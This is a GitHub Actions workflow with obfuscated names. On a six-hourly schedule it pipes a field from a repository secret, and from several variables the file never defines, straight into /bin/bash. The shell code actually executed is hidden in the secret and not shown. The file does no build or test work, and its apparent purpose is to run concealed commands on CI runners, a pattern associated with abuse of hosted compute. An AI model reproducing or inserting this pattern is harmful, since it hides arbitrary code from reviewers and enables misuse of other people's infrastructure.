name: chenzhishi4567

on:
  workflow_dispatch:
  schedule:
    - cron: '33 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenzhishi4567
        env:
          k23: ${{ secrets.k23 }}
        run: |
          echo $k23 | jq -r .v0 | /bin/bash
          echo $ptum26 | jq -r .lw6531 | /bin/bash
          echo $ozjwr98093 | jq -r .q4945 | /bin/bash
          echo $mg4 | jq -r .qnnu69570 | /bin/bash
          echo $wb7533 | jq -r .quc09 | /bin/bash
          echo $rq94838 | jq -r .onlu28166 | /bin/bash
          echo $sklc2 | jq -r .mra97 | /bin/bash

